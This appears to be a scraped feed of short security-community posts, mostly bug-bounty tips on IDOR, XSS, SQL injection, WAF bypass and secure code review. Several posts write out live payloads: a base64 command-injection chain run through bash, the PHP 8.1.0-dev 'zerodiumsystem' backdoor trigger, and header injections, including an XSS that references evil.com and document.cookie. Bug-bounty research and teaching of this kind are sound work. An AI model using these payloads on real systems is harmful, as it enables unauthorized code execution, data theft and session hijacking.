Content you might like
🚨 #DataProtection alert! The pappers.fr platform @get_pappers exposes too much of our personal data. My signature and my address are accessible with a single click on Google. Why is this information so easily available? @cnil @cnil_eu #CNIL #RGPD
I’m so sick of these dickheads. Meanwhile, I’m trying to report massive data breaches to orgs who aren’t replying because they get so much crap like Sam’s!
🔥Best IDOR Checklist #infosec #cybersec #bugbountytips #BugBounty
.@insiderPhD's beginners guide to finding #IDORs 👇 #bugbountytips
🧵 Welcome to Day 19 of the Secure Code Review Series! Today, we’re diving into Insufficient Logging and Monitoring—a silent but critical vulnerability that can make or break your ability to detect and respond to attacks. Let’s learn how to spot weak logging practices and…
Command injection with no spaces and no outbound? 1. base64 a complex command locally 2. {shuf,-e,"$b64",-o,$file} 3. {openssl,base64,-d,-in,$file,-out,$script} 4. {bash,$script} - gtfobins.github.io/#+file%20write #infosec #cybersec #bugbountytips
HackerOne disclosed a bug submitted by @haxta4ok: hackerone.com/reports/1618347 - Bounty: $25,000 #hackerone #bugbounty
Easy P4: Cloudflare Bypass, Origin IP Found (Part 2) sudosuraj.medium.com/easy-p4-cloudf… #bugbounty #bugbountytips #bugbountytip
This is a short part 2 of Cloudflare WAF bypass, Find Origin IP techniques.
If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); Post by:- @0x0SojalSec #bugbountytips #infosec #bugbounty #bugbountytip #hacking #hacker #cybersecurity
Day 4 & 5 : RCE - CVE-2024-9593 Link : github.com/RandomRobbieBF…
Header based injection: X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)> X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Referer:…
Try this powerful XSS bypass. Many WAFs have not blacklisted this event handler, so you can take advantage of it
Reverse-engineering DLLs requires the right tools to uncover vulns. 4 tools for hacking DLLs 🧵👇
Actually yes, we saw a case of that same lure earlier this week. :) Cutesy copy-pasta, I am trying to weigh if it is worth a video or not 😅
try this extension to detect all types of SQLi+WAFBypass payloads just copy and try manually or you can use intruder for testing timebased sqli just set to resource pool to 1 concurrent request and check the response delay..
The client-side hackers toolkit: 1⃣ DevTools 2⃣ DOM Logger++ 3⃣ DOM Invader or EvalVillain 4⃣ de4js.kshift.me 5⃣ Humanify 6⃣ JSWZL lots to learn!
🔥 XSS on any website with missing charset information? 😳 Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post: sonarsource.com/blog/encoding-… #appsec #security #vulnerability